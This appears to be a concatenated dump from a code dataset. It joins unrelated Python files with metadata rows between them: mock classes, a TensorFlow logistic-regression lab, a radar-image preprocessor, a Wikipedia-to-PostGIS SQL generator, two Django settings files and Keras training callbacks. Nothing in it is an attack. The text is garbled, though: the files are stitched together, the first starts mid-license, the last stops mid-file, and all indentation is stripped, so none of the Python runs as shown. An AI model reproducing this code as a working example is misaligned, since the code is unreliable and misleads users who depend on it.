# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class MockProperty(object):
def __init__(self, val, name):
self.val = val
self.name = name
class MockDNSInfo(object):
def __init__(self, string):
self.string = string
class MockvCenterHost(dict):
def __init__(self, obj):
self.obj = obj
class MockNicContainer(object):
def __init__(self, nicList):
self.PhysicalNic = nicList
self.HostVirtualNic = nicList
| apache-2.0 | -7,512,709,806,719,100,000 | 29.361111 | 78 | 0.68161 | false | 3.795139 | false | false | false |
MilyangParkJaeHoon/deeplearning | lab5/logistic_regression_diabetes.py | 1 | 1731 | # Lab 5 Logistic Regression Classifier
import tensorflow as tf
import numpy as np
tf.set_random_seed(777) # for reproducibility
xy = np.loadtxt('data-03-diabetes.csv', delimiter=',', dtype=np.float32)
x_data = xy[:, 0:-1]
y_data = xy[:, [-1]]
print(x_data.shape, y_data.shape)
# placeholders for a tensor that will be always fed.
X = tf.placeholder(tf.float32, shape=[None, 8])
Y = tf.placeholder(tf.float32, shape=[None, 1])
W = tf.Variable(tf.random_normal([8, 1]), name='weight')
b = tf.Variable(tf.random_normal([1]), name='bias')
# Hypothesis using sigmoid: tf.div(1., 1. + tf.exp(tf.matmul(X, W)))
hypothesis = tf.sigmoid(tf.matmul(X, W) + b)
# cost/loss function
cost = -tf.reduce_mean(Y * tf.log(hypothesis) + (1 - Y) *
tf.log(1 - hypothesis))
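# The cost above is binary cross-entropy written out by hand; a numerically
# safer equivalent, had the pre-sigmoid logits been kept, would be
# tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=Y, logits=logits))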
train = tf.train.GradientDescentOptimizer(learning_rate=0.01).minimize(cost)
# Accuracy computation
# True if hypothesis>0.5 else False
predicted = tf.cast(hypothesis > 0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Launch graph
with tf.Session() as sess:
# Initialize TensorFlow variables
sess.run(tf.global_variables_initializer())
for step in range(10001):
cost_val, _ = sess.run([cost, train], feed_dict={X: x_data, Y: y_data})
if step % 200 == 0:
print(step, cost_val)
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy],
feed_dict={X: x_data, Y: y_data})
print("\nHypothesis: ", h, "\nCorrect (Y): ", c, "\nAccuracy: ", a)
'''
0 0.82794
200 0.755181
400 0.726355
600 0.705179
800 0.686631
...
9600 0.492056
9800 0.491396
10000 0.490767
...
[ 1.]
[ 1.]
[ 1.]]
Accuracy: 0.762846
'''
| mit | -621,509,392,199,968,800 | 25.630769 | 79 | 0.641248 | false | 2.78744 | false | false | false |
simonwsw/deep-soli | pre/op.py | 1 | 3786 | import os, subprocess
import numpy as np
import h5py
import json
from image import image
class Operation:
def __init__(self):
pass
# generate image for each sequence
def generate_image(self, source, target, num_channel, origin_size=32,
out_size=32, bound=15.0, bin_image='image/bin/image'):
if not os.path.exists(target): os.makedirs(target)
# run flow command
p = subprocess.Popen([bin_image,
'--source', source, '--target', target,
'--channel', str(num_channel),
'--origin', str(origin_size),
'--out', str(out_size),
'--bound', str(bound)])
p.wait()
# generate label file
self._generate_label(source, target)
# load labels
def _generate_label(self, source, target, label_file='label.json'):
with h5py.File(source, 'r') as hf:
labels = [int(l) for l in hf['label'][()]]
# save labels as a dict in json file
labels_dict = {i: l
for i, l in zip(range(len(labels) - 1), labels[1:])}
with open(os.path.join(target, label_file), 'w') as jf:
json.dump(labels_dict, jf)
# delete generated image files
def clean_image(self, file_dir, label_file='label.json'):
print 'Cleaning', file_dir
# delete images in dir
image_files = [os.path.join(file_dir, f)
for f in os.listdir(file_dir)
if os.path.isfile(os.path.join(file_dir, f)) and 'jpg' in f]
for image_file in image_files:
try:
os.remove(image_file)
except Exception, e:
print e
# delete label file
try:
os.remove(os.path.join(file_dir, label_file))
except Exception, e:
print e
# delete dir
try:
os.rmdir(file_dir)
except Exception, e:
print e
# get frame count
def _get_frame_num(self, source, label_file='label.json'):
with open(os.path.join(source, label_file), 'r') as jf:
labels_dict = json.load(jf)
return len(labels_dict)
# setup mean counter and accumulator at the beginning
def setup_mean(self, num_channel, out_size):
self.image_sums = {}
self.count = 0.0
for c in range(num_channel):
self.image_sums['ch%i_image' % (c,)] = \
np.zeros((1, out_size, out_size), dtype='float32')
# accumulate mean for each sequence
def accum_mean(self, source, num_channel, out_size):
print 'Loading mean', source
frame_num = self._get_frame_num(source)
self.count += frame_num
for c in range(num_channel):
for i in range(frame_num):
image_name = os.path.join(source,
'ch%i_%i_image.jpg' % (c, i))
self.image_sums['ch%i_image' % (c,)] += \
image(image_name).load(out_size, out_size)
# save accumulated mean to file
def save_mean(self, mean_file, num_channel):
# store file as hdf5
if mean_file.endswith('h5'):
print 'Save as hdf5'
with h5py.File(mean_file, 'w') as f:
for c in range(num_channel):
f.create_dataset('ch%i_image' % (c,),
data=self.image_sums['ch%i_image' % (c,)]
/ self.count)
# store file as matlab data
elif mean_file.endswith('mat'):
import scipy.io as sio
print 'Save as mat'
data = {}
for c in range(num_channel):
data['ch%i_image' % (c,)] = \
self.image_sums['ch%i_image' % (c,)] / self.count
sio.savemat(mean_file, data)
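# Example usage sketch (paths and channel count are assumptions, not taken
# from the original project):
#   op = Operation()
#   op.setup_mean(num_channel=4, out_size=32)
#   op.accum_mean('data/seq_0001', num_channel=4, out_size=32)
#   op.save_mean('data/mean.h5', num_channel=4)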
| mit | -8,486,536,525,631,522,000 | 35.403846 | 73 | 0.53196 | false | 3.640385 | false | false | false |
bigr/map1 | read-wiki/readwiki.py | 1 | 11143 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import re
import xml.etree.cElementTree as xml
import codecs
from string import replace
def parseGeoLocation(geo_cz, geo_dms, geo, coord=None):
try:
toNumber = lambda s:float(replace(s,u",",u"."))
if geo_cz:
x = geo_cz.split('|')
return (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[3]) + toNumber(x[4])/60.0 + toNumber(x[5])/3600.0)
elif geo_dms:
x = geo_dms.split('|')
ret = (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[5]) + toNumber(x[6])/60.0 + toNumber(x[7])/3600.0)
if x[3]=='S':
ret = (-ret[0],ret[1])
if x[8]=='W':
ret = (ret[0],-ret[1])
return ret
elif geo:
x = geo.split('|')
x = x[0].split('_')
if x[3] in ['S','N'] and x[7] in ['W','E']:
ret = (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[4]) + toNumber(x[5])/60.0 + toNumber(x[6])/3600.0)
if x[3]=='S':
ret = (-ret[0],ret[1])
if x[7]=='W':
ret = (ret[0],-ret[1])
return ret
elif x[2] in ['S','N'] and x[5] in ['W','E']:
ret = (toNumber(x[0]) + toNumber(x[1])/60.0,toNumber(x[3]) + toNumber(x[4])/60.0)
if x[2]=='S':
ret = (-ret[0],ret[1])
if x[5]=='W':
ret = (ret[0],-ret[1])
return ret
elif coord:
pass;
return None;
except:
return None;
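# Example, assuming the "geo cz" layout lat_deg|min|sec|lon_deg|min|sec:
#   parseGeoLocation(u"50|5|6|14|25|0", None, None) -> (50.085, 14.41666...)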
sys.stdout=codecs.getwriter('utf-8')(sys.stdout)
source = sys.stdin
context = iter(xml.iterparse(source, events=("start", "end")))
_,root = context.next()
geo_cz_pattern = re.compile(ur"{{(?:g|G)eo cz\|([^}{]+)}}");
geo_dms_pattern = re.compile(ur"{{(?:g|G)eo dms\|([^}{]+)}}");
geo_pattern = re.compile(ur"{{(?:g|G)eo\|([^}{]+)}}");
coord_pattern = re.compile(ur"{{(?:c|C|k|K)oord(?:ynaty)?\|([^}{]+)}}");
category_pattern = re.compile(ur"\[\[(?:k|K)ategorie:([^\]\|]+)(?:\|[^\]]*)?\]\]");
infobox_pattern = re.compile(ur"{{(?:i|I)nfobox[\s-]*([^\|]+)\|[^}]*}}");
#ele_pattern = re.compile(ur"\|/s*vrchol/s*=/s*([0..9]+)");
ele_pattern = re.compile(ur"\| (?:vrchol|kóta) = ([0-9\s]+)");
population_pattern = re.compile(ur"\| (?:obyvatelé) = ([0-9\s\.]+)");
status_pattern = re.compile(ur"\| (?:status) = ([^\s]+)");
name_pattern = re.compile(ur"(?:\|)? (?:název) = (.+)");
print """
DROP TABLE IF EXISTS "wiki";
SELECT DropGeometryColumn('public','wiki', 'way');
CREATE TABLE "wiki" (
"id" BIGINT PRIMARY KEY,
"title" VARCHAR(511),
"name" VARCHAR(511),
"infobox" VARCHAR(127),
"status" VARCHAR(127),
"ele" INT,
"population" INT,
"cats" VARCHAR(1023),
"text_length" INT,
"historic" VARCHAR(127),
"castle_type" VARCHAR(127),
"ruins" INT,
"amenity" VARCHAR(127),
"religion" VARCHAR(63),
"place_of_worship" VARCHAR(63),
"tourism" VARCHAR(63),
"natural" VARCHAR(127),
"nkp" INT,
"kp" INT,
"osm_id" BIGINT
);
SELECT AddGeometryColumn('wiki', 'way', 900913, 'POINT', 2);
"""
page = False
id = 0;
for event, elem in context:
if elem.tag == "{http://www.mediawiki.org/xml/export-0.6/}page":
page = event == 'start'
if event == 'end':
if geo_cz or geo_dms or geo:
cats = ';'.join(categories) if categories else ''
id += 1;
tmp = parseGeoLocation(geo_cz, geo_dms,geo)
if tmp:
print "INSERT INTO wiki (id,way,title,name,infobox,status,ele,population,cats,text_length) VALUES (%(id)s,ST_Transform(ST_SetSRID(ST_MakePoint(%(lon)s,%(lat)s),4326),900913),%(title)s,%(name)s,%(infobox)s,%(status)s,%(ele)s,%(population)s,%(cats)s,%(text_length)s);" % {
'id': id,
'lat': tmp[0],
'lon': tmp[1],
'title': ("'" + replace(title,"'","''") + "'") if title else 'null',
'name': ("'" + replace(name,"'","''") + "'") if name else 'null',
'infobox': ("'" + infobox + "'") if infobox else 'null',
'status': ("'" + replace(status,"'","''") + "'") if status else 'null',
'ele': ("'" + str(ele) + "'") if ele else 'null',
'population': ("'" + str(population) + "'") if population else 'null',
'cats': ("'" + replace(cats,"'","''") + "'") if cats else 'null',
'text_length': ("'" + str(text_length) + "'") if text_length else 'null'
}
else:
text_length = name = population = status = ele = infobox = categories = geo_cz = geo_dms = geo = None
elif page and event == 'end':
if elem.tag=='{http://www.mediawiki.org/xml/export-0.6/}title':
title = elem.text
elif elem.tag=='{http://www.mediawiki.org/xml/export-0.6/}text':
if elem.text:
text = replace(elem.text,' ',' ')
text_length = len(text)
geo_cz = geo_cz_pattern.search(text)
geo_cz = geo_cz.group(1) if geo_cz else None
geo_dms = geo_dms_pattern.search(text)
geo_dms = geo_dms.group(1) if geo_dms else None
geo = geo_pattern.search(text)
geo = geo.group(1) if geo else None
categories = category_pattern.findall(text)
infobox = infobox_pattern.search(text)
infobox = infobox.group(1).strip() if infobox else None
try:
ele = ele_pattern.search(text)
ele = int(re.sub("[^0-9]",'',ele.group(1))) if ele else None
except:
ele = None
try:
population = population_pattern.search(text)
population = int(re.sub("[^0-9]",'',population.group(1))) if population else None
except:
population = None
status = status_pattern.search(text)
status = status.group(1).strip() if status else None
name = name_pattern.search(text)
name = name.group(1).strip() if name else None
else:
text_length = name = population = status = ele = infobox = categories = geo_cz = geo_dms = geo = None
if event == 'end':
root.clear()
print """
UPDATE wiki W
SET osm_id = P.osm_id
FROM planet_osm_point P
WHERE
P.place IN ('city','town','village','hamlet','isolated_dwelling','suburb','neighbourhood')
AND COALESCE(W.name,W.title) = P.name
AND ST_DWithin(W.way,P.way,3000)
AND W.population IS NOT NULL;
UPDATE wiki W
SET osm_id = P.osm_id
FROM planet_osm_point P
WHERE
P.natural = 'peak'
AND W.infobox = 'hora'
AND (
(ST_DWithin(W.way,P.way,300) AND COALESCE(W.name,W.title) = P.name)
OR (ST_DWithin(W.way,P.way,100) AND (W.name IS NULL OR P.name IS NULL))
OR ST_DWithin(W.way,P.way,30)
);
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,historic FROM planet_osm_point
UNION SELECT osm_id,name,way,historic FROM planet_osm_polygon) P
WHERE
P.historic IN ('castle','ruins')
AND (
ST_DWithin(W.way,P.way,1000 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'hrad|z..cenina|z.mek|tvrz','','i'),regexp_replace(P.name,'hrad|z..cenina|z.mek|tvrz','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'hrad|z..cenina|z.mek','','i'),regexp_replace(P.name,'hrad|z..cenina|z.mek','','i')))
LIMIT 1
)
WHERE
W.infobox in ('Hrad','hrad')
OR W.cats LIKE ('%Hrady %')
OR W.cats LIKE ('%Z_mky %')
OR W.cats LIKE ('%Tvrze %')
OR W.cats LIKE ('%Z__ceniny hrad_ %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,amenity FROM planet_osm_point
UNION SELECT osm_id,name,way,amenity FROM planet_osm_polygon) P
WHERE
P.amenity = 'place_of_worship'
AND (
ST_DWithin(W.way,P.way,300 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'kostel','','i'),regexp_replace(P.name,'kostel','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'kostel','','i'),regexp_replace(P.name,'kostel','','i')))
LIMIT 1
)
WHERE
W.infobox in ('kostel','Kostel')
OR W.cats LIKE ('%Kostely %')
OR W.cats LIKE ('%Kaple %')
OR W.cats LIKE ('%Kl__tery %')
OR W.cats LIKE ('%Me_ity %')
OR W.cats LIKE ('%Synagogy %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,amenity FROM planet_osm_point
UNION SELECT osm_id,name,way,amenity FROM planet_osm_polygon) P
WHERE
P.amenity = 'theatre'
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'divadlo','','i'),regexp_replace(P.name,'divadlo','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'divadlo','','i'),regexp_replace(P.name,'divadlo','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Divadla %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,tourism FROM planet_osm_point
UNION SELECT osm_id,name,way,tourism FROM planet_osm_polygon) P
WHERE
P.tourism IN ('museum','gallery')
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'muzeum','','i'),regexp_replace(P.name,'muzeum','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'muzeum','','i'),regexp_replace(P.name,'muzeum','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Muzea %')
OR W.cats LIKE ('%Galerie %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,historic FROM planet_osm_point
UNION SELECT osm_id,name,way,historic FROM planet_osm_polygon) P
WHERE
P.historic IN ('memorial','monument')
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'pam.tn.k|pomn.k','','i'),regexp_replace(P.name,'pam.tn.k|pomn.k','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'pam.tn.k|pomn.k','','i'),regexp_replace(P.name,'pam.tn.k|pomn.k','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Pomn_ky a pam_tn_ky %');
UPDATE wiki W
SET "natural" = 'peak'
WHERE W.infobox = 'hora';
UPDATE wiki W
SET
historic = 'castle',
castle_type = (CASE
WHEN W.cats LIKE ('%Hrady %') OR W.cats LIKE ('%Z__ceniny hrad_ %') THEN 'defensive'
WHEN W.cats LIKE ('%Z_mky %') THEN 'stately'
ELSE NULL
END),
ruins = (CASE
WHEN W.cats LIKE ('%Z__ceniny %') THEN 1
ELSE NULL
END)
WHERE
W.infobox in ('Hrad','hrad')
OR W.cats LIKE ('%Hrady %')
OR W.cats LIKE ('%Z_mky %')
OR W.cats LIKE ('%Z__ceniny hrad_ %');
UPDATE wiki W
SET
amenity = 'place_of_worship',
religion = (CASE
WHEN W.cats LIKE ('%Me_ity %') THEN 'christian'
WHEN W.cats LIKE ('%Synagogy %') THEN 'jewish'
ELSE 'muslim'
END),
place_of_worship = (CASE
WHEN W.cats LIKE ('%Kaple %') THEN 'chapel'
WHEN W.cats LIKE ('%Kl__tery %') THEN 'monastery'
ELSE 'church'
END)
WHERE
W.infobox in ('kostel','Kostel')
OR W.cats LIKE ('%Kostely %')
OR W.cats LIKE ('%Kaple %')
OR W.cats LIKE ('%Kl__tery %')
OR W.cats LIKE ('%Me_ity %')
OR W.cats LIKE ('%Synagogy %');
UPDATE wiki W
SET amenity = 'theatre'
WHERE
W.cats LIKE ('%Divadla %');
UPDATE wiki W
SET tourism = 'museum'
WHERE
W.cats LIKE ('%Muzeua %')
OR W.cats LIKE ('%Galerie %');
UPDATE wiki W
SET nkp = 1
WHERE
W.cats LIKE ('%N_rodn_ kulturn_ p_m_tky %');
UPDATE wiki W
SET kp = 1
WHERE
W.cats LIKE ('%Kulturn_ p_m_tky %');
"""
| agpl-3.0 | 8,709,117,120,043,532,000 | 30.204482 | 275 | 0.591741 | false | 2.559155 | false | false | false |
sunoru/pokemon_only | msite/settings_default.py | 1 | 3588 | """
Django settings for Pokemon Only project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DATA_DIR = os.path.join(BASE_DIR, 'data')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
with open(os.path.join(DATA_DIR, 'secret_key.txt')) as f:
SECRET_KEY = f.read().strip()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'stall',
'tourney',
'pmo2015',
'pmo2016',
'dashboard',
'captcha',
)
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'msite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
'templates'
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.media',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'msite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
"static/",
)
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
BASE_URL = 'https://www.getdaze.org'
CONTACT_EMAIL = 'contact@getdaze.org'
WEIBO_URL = 'http://weibo.com/SHPMO'
CURRENT_PMO = 'pmo2020'
# Email settings
with open(os.path.join(DATA_DIR, 'secret_email.txt')) as f:
EMAIL_HOST, EMAIL_HOST_USER, EMAIL_HOST_PASSWORD = f.read().split()
EMAIL_PORT = 587
EMAIL_SUBJECT_PREFIX = '[%s] ' % CURRENT_PMO.upper()
EMAIL_USE_TLS = True
import pmo2015.helpers
CAPTCHA_CHALLENGE_FUNCT = pmo2015.helpers.word_challenge
CAPTCHA_IMAGE_SIZE = (300, 31)
PMO_LIST = {
'unknown': False,
'pmo2015': False,
'pmo2016': False,
'pmo2017': False,
'pmo2018': False,
'pmo2019': False,
'pmo2020': True
}
| gpl-2.0 | 441,406,430,976,898,240 | 24.090909 | 71 | 0.67029 | false | 3.241192 | false | false | false |
tensorflow/models | official/vision/image_classification/callbacks.py | 1 | 9323 | # Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Common modules for callbacks."""
from __future__ import absolute_import
from __future__ import division
# from __future__ import google_type_annotations
from __future__ import print_function
import os
from typing import Any, List, MutableMapping, Optional, Text
from absl import logging
import tensorflow as tf
from official.modeling import optimization
from official.utils.misc import keras_utils
def get_callbacks(
model_checkpoint: bool = True,
include_tensorboard: bool = True,
time_history: bool = True,
track_lr: bool = True,
write_model_weights: bool = True,
apply_moving_average: bool = False,
initial_step: int = 0,
batch_size: int = 0,
log_steps: int = 0,
model_dir: Optional[str] = None,
backup_and_restore: bool = False) -> List[tf.keras.callbacks.Callback]:
"""Get all callbacks."""
model_dir = model_dir or ''
callbacks = []
if model_checkpoint:
ckpt_full_path = os.path.join(model_dir, 'model.ckpt-{epoch:04d}')
callbacks.append(
tf.keras.callbacks.ModelCheckpoint(
ckpt_full_path, save_weights_only=True, verbose=1))
if backup_and_restore:
backup_dir = os.path.join(model_dir, 'tmp')
callbacks.append(
tf.keras.callbacks.experimental.BackupAndRestore(backup_dir))
if include_tensorboard:
callbacks.append(
CustomTensorBoard(
log_dir=model_dir,
track_lr=track_lr,
initial_step=initial_step,
write_images=write_model_weights,
profile_batch=0))
if time_history:
callbacks.append(
keras_utils.TimeHistory(
batch_size,
log_steps,
logdir=model_dir if include_tensorboard else None))
if apply_moving_average:
# Save moving average model to a different file so that
# we can resume training from a checkpoint
ckpt_full_path = os.path.join(model_dir, 'average',
'model.ckpt-{epoch:04d}')
callbacks.append(
AverageModelCheckpoint(
update_weights=False,
filepath=ckpt_full_path,
save_weights_only=True,
verbose=1))
callbacks.append(MovingAverageCallback())
return callbacks
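# Example usage sketch (hypothetical values, not part of the original module):
#   callbacks = get_callbacks(
#       model_checkpoint=True,
#       include_tensorboard=True,
#       time_history=True,
#       track_lr=True,
#       write_model_weights=False,
#       batch_size=256,
#       log_steps=100,
#       model_dir='/tmp/resnet_run')
#   model.fit(train_ds, epochs=90, callbacks=callbacks)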
def get_scalar_from_tensor(t: tf.Tensor) -> int:
"""Utility function to convert a Tensor to a scalar."""
t = tf.keras.backend.get_value(t)
if callable(t):
return t()
else:
return t
class CustomTensorBoard(tf.keras.callbacks.TensorBoard):
"""A customized TensorBoard callback that tracks additional datapoints.
Metrics tracked:
- Global learning rate
Attributes:
log_dir: the path of the directory where to save the log files to be parsed
by TensorBoard.
track_lr: `bool`, whether or not to track the global learning rate.
initial_step: the initial step, used for preemption recovery.
**kwargs: Additional arguments for backwards compatibility. Possible key is
`period`.
"""
# TODO(b/146499062): track params, flops, log lr, l2 loss,
# classification loss
def __init__(self,
log_dir: str,
track_lr: bool = False,
initial_step: int = 0,
**kwargs):
super(CustomTensorBoard, self).__init__(log_dir=log_dir, **kwargs)
self.step = initial_step
self._track_lr = track_lr
def on_batch_begin(self,
epoch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
self.step += 1
if logs is None:
logs = {}
logs.update(self._calculate_metrics())
super(CustomTensorBoard, self).on_batch_begin(epoch, logs)
def on_epoch_begin(self,
epoch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
if logs is None:
logs = {}
metrics = self._calculate_metrics()
logs.update(metrics)
for k, v in metrics.items():
logging.info('Current %s: %f', k, v)
super(CustomTensorBoard, self).on_epoch_begin(epoch, logs)
def on_epoch_end(self,
epoch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
if logs is None:
logs = {}
metrics = self._calculate_metrics()
logs.update(metrics)
super(CustomTensorBoard, self).on_epoch_end(epoch, logs)
def _calculate_metrics(self) -> MutableMapping[str, Any]:
logs = {}
# TODO(b/149030439): disable LR reporting.
# if self._track_lr:
# logs['learning_rate'] = self._calculate_lr()
return logs
def _calculate_lr(self) -> int:
"""Calculates the learning rate given the current step."""
return get_scalar_from_tensor(
self._get_base_optimizer()._decayed_lr(var_dtype=tf.float32)) # pylint:disable=protected-access
def _get_base_optimizer(self) -> tf.keras.optimizers.Optimizer:
"""Get the base optimizer used by the current model."""
optimizer = self.model.optimizer
# The optimizer might be wrapped by another class, so unwrap it
while hasattr(optimizer, '_optimizer'):
optimizer = optimizer._optimizer # pylint:disable=protected-access
return optimizer
class MovingAverageCallback(tf.keras.callbacks.Callback):
"""A Callback to be used with a `ExponentialMovingAverage` optimizer.
Applies moving average weights to the model during validation time to test
and predict on the averaged weights rather than the current model weights.
Once training is complete, the model weights will be overwritten with the
averaged weights (by default).
Attributes:
overwrite_weights_on_train_end: Whether to overwrite the current model
weights with the averaged weights from the moving average optimizer.
**kwargs: Any additional callback arguments.
"""
def __init__(self, overwrite_weights_on_train_end: bool = False, **kwargs):
super(MovingAverageCallback, self).__init__(**kwargs)
self.overwrite_weights_on_train_end = overwrite_weights_on_train_end
def set_model(self, model: tf.keras.Model):
super(MovingAverageCallback, self).set_model(model)
assert isinstance(self.model.optimizer,
optimization.ExponentialMovingAverage)
self.model.optimizer.shadow_copy(self.model)
def on_test_begin(self, logs: Optional[MutableMapping[Text, Any]] = None):
self.model.optimizer.swap_weights()
def on_test_end(self, logs: Optional[MutableMapping[Text, Any]] = None):
self.model.optimizer.swap_weights()
def on_train_end(self, logs: Optional[MutableMapping[Text, Any]] = None):
if self.overwrite_weights_on_train_end:
self.model.optimizer.assign_average_vars(self.model.variables)
class AverageModelCheckpoint(tf.keras.callbacks.ModelCheckpoint):
"""Saves and, optionally, assigns the averaged weights.
Taken from tfa.callbacks.AverageModelCheckpoint.
Attributes:
update_weights: If True, assign the moving average weights to the model, and
save them. If False, keep the old non-averaged weights, but the saved
model uses the average weights. See `tf.keras.callbacks.ModelCheckpoint`
for the other args.
"""
def __init__(self,
update_weights: bool,
filepath: str,
monitor: str = 'val_loss',
verbose: int = 0,
save_best_only: bool = False,
save_weights_only: bool = False,
mode: str = 'auto',
save_freq: str = 'epoch',
**kwargs):
self.update_weights = update_weights
super().__init__(filepath, monitor, verbose, save_best_only,
save_weights_only, mode, save_freq, **kwargs)
def set_model(self, model):
if not isinstance(model.optimizer, optimization.ExponentialMovingAverage):
raise TypeError('AverageModelCheckpoint is only used when training'
'with MovingAverage')
return super().set_model(model)
def _save_model(self, epoch, logs):
assert isinstance(self.model.optimizer,
optimization.ExponentialMovingAverage)
if self.update_weights:
self.model.optimizer.assign_average_vars(self.model.variables)
return super()._save_model(epoch, logs)
else:
# Note: `model.get_weights()` gives us the weights (non-ref)
# whereas `model.variables` returns references to the variables.
non_avg_weights = self.model.get_weights()
self.model.optimizer.assign_average_vars(self.model.variables)
# result is currently None, since `super._save_model` doesn't
# return anything, but this may change in the future.
result = super()._save_model(epoch, logs)
self.model.set_weights(non_avg_weights)
return result
| apache-2.0 | -1,199,922,158,997,506,300 | 35.276265 | 104 | 0.664486 | false | 3.958811 | false | false | false |
ninjahoahong/django-yaas | YAAS/settings.py | 1 | 5428 | # Django settings for YAAS project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('admin', 'admin@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'YAASdb.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
